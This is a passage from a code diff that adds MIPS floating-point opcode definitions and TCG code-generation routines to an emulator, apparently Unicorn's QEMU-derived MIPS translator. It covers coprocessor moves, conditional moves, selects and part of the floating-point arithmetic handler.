FMT_S), + OPC_CMP_NGL_S = FOP (59, FMT_S), + OPC_CMP_LT_S = FOP (60, FMT_S), + OPC_CMP_NGE_S = FOP (61, FMT_S), + OPC_CMP_LE_S = FOP (62, FMT_S), + OPC_CMP_NGT_S = FOP (63, FMT_S), + + OPC_ADD_D = FOP(0, FMT_D), + OPC_SUB_D = FOP(1, FMT_D), + OPC_MUL_D = FOP(2, FMT_D), + OPC_DIV_D = FOP(3, FMT_D), + OPC_SQRT_D = FOP(4, FMT_D), + 
OPC_ABS_D = FOP(5, FMT_D), + OPC_MOV_D = FOP(6, FMT_D), + OPC_NEG_D = FOP(7, FMT_D), + OPC_ROUND_L_D = FOP(8, FMT_D), + OPC_TRUNC_L_D = FOP(9, FMT_D), + OPC_CEIL_L_D = FOP(10, FMT_D), + OPC_FLOOR_L_D = FOP(11, FMT_D), + OPC_ROUND_W_D = FOP(12, FMT_D), + OPC_TRUNC_W_D = FOP(13, FMT_D), + OPC_CEIL_W_D = FOP(14, FMT_D), + OPC_FLOOR_W_D = FOP(15, FMT_D), + OPC_SEL_D = FOP(16, FMT_D), + OPC_MOVCF_D = FOP(17, FMT_D), + OPC_MOVZ_D = FOP(18, FMT_D), + OPC_MOVN_D = FOP(19, FMT_D), + OPC_SELEQZ_D = FOP(20, FMT_D), + OPC_RECIP_D = FOP(21, FMT_D), + OPC_RSQRT_D = FOP(22, FMT_D), + OPC_SELNEZ_D = FOP(23, FMT_D), + OPC_MADDF_D = FOP(24, FMT_D), + OPC_MSUBF_D = FOP(25, FMT_D), + OPC_RINT_D = FOP(26, FMT_D), + OPC_CLASS_D = FOP(27, FMT_D), + OPC_MIN_D = FOP(28, FMT_D), + OPC_RECIP2_D = FOP(28, FMT_D), + OPC_MINA_D = FOP(29, FMT_D), + OPC_RECIP1_D = FOP(29, FMT_D), + OPC_MAX_D = FOP(30, FMT_D), + OPC_RSQRT1_D = FOP(30, FMT_D), + OPC_MAXA_D = FOP(31, FMT_D), + OPC_RSQRT2_D = FOP(31, FMT_D), + OPC_CVT_S_D = FOP(32, FMT_D), + OPC_CVT_W_D = FOP(36, FMT_D), + OPC_CVT_L_D = FOP(37, FMT_D), + OPC_CMP_F_D = FOP (48, FMT_D), + OPC_CMP_UN_D = FOP (49, FMT_D), + OPC_CMP_EQ_D = FOP (50, FMT_D), + OPC_CMP_UEQ_D = FOP (51, FMT_D), + OPC_CMP_OLT_D = FOP (52, FMT_D), + OPC_CMP_ULT_D = FOP (53, FMT_D), + OPC_CMP_OLE_D = FOP (54, FMT_D), + OPC_CMP_ULE_D = FOP (55, FMT_D), + OPC_CMP_SF_D = FOP (56, FMT_D), + OPC_CMP_NGLE_D = FOP (57, FMT_D), + OPC_CMP_SEQ_D = FOP (58, FMT_D), + OPC_CMP_NGL_D = FOP (59, FMT_D), + OPC_CMP_LT_D = FOP (60, FMT_D), + OPC_CMP_NGE_D = FOP (61, FMT_D), + OPC_CMP_LE_D = FOP (62, FMT_D), + OPC_CMP_NGT_D = FOP (63, FMT_D), + + OPC_CVT_S_W = FOP(32, FMT_W), + OPC_CVT_D_W = FOP(33, FMT_W), + OPC_CVT_S_L = FOP(32, FMT_L), + OPC_CVT_D_L = FOP(33, FMT_L), + OPC_CVT_PS_PW = FOP(38, FMT_W), + + OPC_ADD_PS = FOP(0, FMT_PS), + OPC_SUB_PS = FOP(1, FMT_PS), + OPC_MUL_PS = FOP(2, FMT_PS), + OPC_DIV_PS = FOP(3, FMT_PS), + OPC_ABS_PS = FOP(5, FMT_PS), + OPC_MOV_PS = FOP(6, FMT_PS), + 
OPC_NEG_PS = FOP(7, FMT_PS), + OPC_MOVCF_PS = FOP(17, FMT_PS), + OPC_MOVZ_PS = FOP(18, FMT_PS), + OPC_MOVN_PS = FOP(19, FMT_PS), + OPC_ADDR_PS = FOP(24, FMT_PS), + OPC_MULR_PS = FOP(26, FMT_PS), + OPC_RECIP2_PS = FOP(28, FMT_PS), + OPC_RECIP1_PS = FOP(29, FMT_PS), + OPC_RSQRT1_PS = FOP(30, FMT_PS), + OPC_RSQRT2_PS = FOP(31, FMT_PS), + + OPC_CVT_S_PU = FOP(32, FMT_PS), + OPC_CVT_PW_PS = FOP(36, FMT_PS), + OPC_CVT_S_PL = FOP(40, FMT_PS), + OPC_PLL_PS = FOP(44, FMT_PS), + OPC_PLU_PS = FOP(45, FMT_PS), + OPC_PUL_PS = FOP(46, FMT_PS), + OPC_PUU_PS = FOP(47, FMT_PS), + OPC_CMP_F_PS = FOP (48, FMT_PS), + OPC_CMP_UN_PS = FOP (49, FMT_PS), + OPC_CMP_EQ_PS = FOP (50, FMT_PS), + OPC_CMP_UEQ_PS = FOP (51, FMT_PS), + OPC_CMP_OLT_PS = FOP (52, FMT_PS), + OPC_CMP_ULT_PS = FOP (53, FMT_PS), + OPC_CMP_OLE_PS = FOP (54, FMT_PS), + OPC_CMP_ULE_PS = FOP (55, FMT_PS), + OPC_CMP_SF_PS = FOP (56, FMT_PS), + OPC_CMP_NGLE_PS = FOP (57, FMT_PS), + OPC_CMP_SEQ_PS = FOP (58, FMT_PS), + OPC_CMP_NGL_PS = FOP (59, FMT_PS), + OPC_CMP_LT_PS = FOP (60, FMT_PS), + OPC_CMP_NGE_PS = FOP (61, FMT_PS), + OPC_CMP_LE_PS = FOP (62, FMT_PS), + OPC_CMP_NGT_PS = FOP (63, FMT_PS), +}; + +enum r6_f_cmp_op { + R6_OPC_CMP_AF_S = FOP(0, FMT_W), + R6_OPC_CMP_UN_S = FOP(1, FMT_W), + R6_OPC_CMP_EQ_S = FOP(2, FMT_W), + R6_OPC_CMP_UEQ_S = FOP(3, FMT_W), + R6_OPC_CMP_LT_S = FOP(4, FMT_W), + R6_OPC_CMP_ULT_S = FOP(5, FMT_W), + R6_OPC_CMP_LE_S = FOP(6, FMT_W), + R6_OPC_CMP_ULE_S = FOP(7, FMT_W), + R6_OPC_CMP_SAF_S = FOP(8, FMT_W), + R6_OPC_CMP_SUN_S = FOP(9, FMT_W), + R6_OPC_CMP_SEQ_S = FOP(10, FMT_W), + R6_OPC_CMP_SEUQ_S = FOP(11, FMT_W), + R6_OPC_CMP_SLT_S = FOP(12, FMT_W), + R6_OPC_CMP_SULT_S = FOP(13, FMT_W), + R6_OPC_CMP_SLE_S = FOP(14, FMT_W), + R6_OPC_CMP_SULE_S = FOP(15, FMT_W), + R6_OPC_CMP_OR_S = FOP(17, FMT_W), + R6_OPC_CMP_UNE_S = FOP(18, FMT_W), + R6_OPC_CMP_NE_S = FOP(19, FMT_W), + R6_OPC_CMP_SOR_S = FOP(25, FMT_W), + R6_OPC_CMP_SUNE_S = FOP(26, FMT_W), + R6_OPC_CMP_SNE_S = FOP(27, FMT_W), + + 
R6_OPC_CMP_AF_D = FOP(0, FMT_L), + R6_OPC_CMP_UN_D = FOP(1, FMT_L), + R6_OPC_CMP_EQ_D = FOP(2, FMT_L), + R6_OPC_CMP_UEQ_D = FOP(3, FMT_L), + R6_OPC_CMP_LT_D = FOP(4, FMT_L), + R6_OPC_CMP_ULT_D = FOP(5, FMT_L), + R6_OPC_CMP_LE_D = FOP(6, FMT_L), + R6_OPC_CMP_ULE_D = FOP(7, FMT_L), + R6_OPC_CMP_SAF_D = FOP(8, FMT_L), + R6_OPC_CMP_SUN_D = FOP(9, FMT_L), + R6_OPC_CMP_SEQ_D = FOP(10, FMT_L), + R6_OPC_CMP_SEUQ_D = FOP(11, FMT_L), + R6_OPC_CMP_SLT_D = FOP(12, FMT_L), + R6_OPC_CMP_SULT_D = FOP(13, FMT_L), + R6_OPC_CMP_SLE_D = FOP(14, FMT_L), + R6_OPC_CMP_SULE_D = FOP(15, FMT_L), + R6_OPC_CMP_OR_D = FOP(17, FMT_L), + R6_OPC_CMP_UNE_D = FOP(18, FMT_L), + R6_OPC_CMP_NE_D = FOP(19, FMT_L), + R6_OPC_CMP_SOR_D = FOP(25, FMT_L), + R6_OPC_CMP_SUNE_D = FOP(26, FMT_L), + R6_OPC_CMP_SNE_D = FOP(27, FMT_L), +}; +static void gen_cp1 (DisasContext *ctx, uint32_t opc, int rt, int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "cp1 move"; + TCGv t0 = tcg_temp_new(tcg_ctx); + + switch (opc) { + case OPC_MFC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + gen_store_gpr(tcg_ctx, t0, rt); + opn = "mfc1"; + break; + case OPC_MTC1: + gen_load_gpr(ctx, t0, rt); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, fs); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mtc1"; + break; + case OPC_CFC1: + gen_helper_1e0i(tcg_ctx, cfc1, t0, fs); + gen_store_gpr(tcg_ctx, t0, rt); + opn = "cfc1"; + break; + case OPC_CTC1: + gen_load_gpr(ctx, t0, rt); + save_cpu_state(ctx, 1); + { + TCGv_i32 fs_tmp = tcg_const_i32(tcg_ctx, fs); + + gen_helper_0e2i(tcg_ctx, ctc1, t0, fs_tmp, rt); + tcg_temp_free_i32(tcg_ctx, fs_tmp); + } + /* Stop translation as we may have changed hflags */ + ctx->bstate = BS_STOP; + opn = "ctc1"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC1: + gen_load_fpr64(ctx, t0, fs); + 
gen_store_gpr(tcg_ctx, t0, rt); + opn = "dmfc1"; + break; + case OPC_DMTC1: + gen_load_gpr(ctx, t0, rt); + gen_store_fpr64(ctx, t0, fs); + opn = "dmtc1"; + break; +#endif + case OPC_MFHC1: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, fs); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + gen_store_gpr(tcg_ctx, t0, rt); + opn = "mfhc1"; + break; + case OPC_MTHC1: + gen_load_gpr(ctx, t0, rt); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32h(ctx, fp0, fs); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mthc1"; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rt], fregnames[fs]); + + out: + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_movci (DisasContext *ctx, int rd, int rs, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int l1; + TCGCond cond; + TCGv_i32 t0; + + if (rd == 0) { + /* Treat as NOP. 
*/ + return; + } + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + l1 = gen_new_label(tcg_ctx); + t0 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + tcg_temp_free_i32(tcg_ctx, t0); + if (rs == 0) { + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + } else { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rs]); + } + gen_set_label(tcg_ctx, l1); +} + +static inline void gen_movcf_s (DisasContext *ctx, int fs, int fd, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + gen_load_fpr32(ctx, t0, fs); + gen_store_fpr32(ctx, t0, fd); + gen_set_label(tcg_ctx, l1); + tcg_temp_free_i32(tcg_ctx, t0); +} + +static inline void gen_movcf_d (DisasContext *ctx, int fs, int fd, int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp0; + int l1 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + tcg_temp_free_i32(tcg_ctx, t0); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); +} + +static inline void gen_movcf_ps(DisasContext *ctx, int fs, int fd, + int cc, int tf) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int cond; + TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + + if (tf) + cond = TCG_COND_EQ; + else + cond = TCG_COND_NE; + + 
tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); + gen_load_fpr32(ctx, t0, fs); + gen_store_fpr32(ctx, t0, fd); + gen_set_label(tcg_ctx, l1); + + tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1U << (get_fp_bit(cc+1) & 0x1f)); + tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l2); + gen_load_fpr32h(ctx, t0, fs); + gen_store_fpr32h(ctx, t0, fd); + tcg_temp_free_i32(tcg_ctx, t0); + gen_set_label(tcg_ctx, l2); +} + +static void gen_sel_s(DisasContext *ctx, enum fopcode op1, int fd, int ft, + int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fd); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fs); + + switch (op1) { + case OPC_SEL_S: + tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); + break; + case OPC_SELEQZ_S: + tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); + break; + case OPC_SELNEZ_S: + tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); + break; + default: + MIPS_INVAL("gen_sel_s"); + generate_exception (ctx, EXCP_RI); + break; + } + + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, t1); +} + +static void gen_sel_d(DisasContext *ctx, enum fopcode op1, int fd, int ft, + int fs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i64 t1 = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fd); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, 
fs); + + switch (op1) { + case OPC_SEL_D: + tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); + break; + case OPC_SELEQZ_D: + tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); + break; + case OPC_SELNEZ_D: + tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); + break; + default: + MIPS_INVAL("gen_sel_d"); + generate_exception (ctx, EXCP_RI); + break; + } + + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +static void gen_farith (DisasContext *ctx, enum fopcode op1, + int ft, int fs, int fd, int cc) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "farith"; + const char *condnames[] = { + "c.f", + "c.un", + "c.eq", + "c.ueq", + "c.olt", + "c.ult", + "c.ole", + "c.ule", + "c.sf", + "c.ngle", + "c.seq", + "c.ngl", + "c.lt", + "c.nge", + "c.le", + "c.ngt", + }; + const char *condnames_abs[] = { + "cabs.f", + "cabs.un", + "cabs.eq", + "cabs.ueq", + "cabs.olt", + "cabs.ult", + "cabs.ole", + "cabs.ule", + "cabs.sf", + "cabs.ngle", + "cabs.seq", + "cabs.ngl", + "cabs.lt", + "cabs.nge", + "cabs.le", + "cabs.ngt", + }; + enum { BINOP, CMPOP, OTHEROP } optype = OTHEROP; + uint32_t func = ctx->opcode & 0x3f; + + switch (op1) { + case OPC_ADD_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_add_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "add.s"; + optype = BINOP; + break; + case OPC_SUB_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = 
tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_sub_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "sub.s"; + optype = BINOP; + break; + case OPC_MUL_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_mul_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mul.s"; + optype = BINOP; + break; + case OPC_DIV_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_div_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "div.s"; + optype = BINOP; + break; + case OPC_SQRT_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_sqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "sqrt.s"; + break; + case OPC_ABS_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_abs_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "abs.s"; + break; + case OPC_MOV_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "mov.s"; + break; + case OPC_NEG_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_chs_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + 
tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "neg.s"; + break; + case OPC_ROUND_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_roundl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "round.l.s"; + break; + case OPC_TRUNC_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_truncl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "trunc.l.s"; + break; + case OPC_CEIL_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_ceill_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "ceil.l.s"; + break; + case OPC_FLOOR_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_floorl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "floor.l.s"; + break; + case OPC_ROUND_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_roundw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "round.w.s"; + break; + case OPC_TRUNC_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + 
gen_helper_float_truncw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "trunc.w.s"; + break; + case OPC_CEIL_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_ceilw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "ceil.w.s"; + break; + case OPC_FLOOR_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_floorw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "floor.w.s"; + break; + case OPC_SEL_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "sel.s"; + break; + case OPC_SELEQZ_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "seleqz.s"; + break; + case OPC_SELNEZ_S: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_s(ctx, op1, fd, ft, fs); + opn = "selnez.s"; + break; + case OPC_MOVCF_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_movcf_s(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.s"; + break; + case OPC_MOVZ_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i32 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + } + fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.s"; + break; + case OPC_MOVN_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i32 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.s"; 
+ break; + case OPC_RECIP_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_recip_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip.s"; + break; + case OPC_RSQRT_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rsqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt.s"; + break; + case OPC_MADDF_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fd); + gen_helper_float_maddf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "maddf.s"; + } + break; + case OPC_MSUBF_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fd); + gen_helper_float_msubf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "msubf.s"; + } + break; + case OPC_RINT_S: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rint_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "rint.s"; + } + break; + 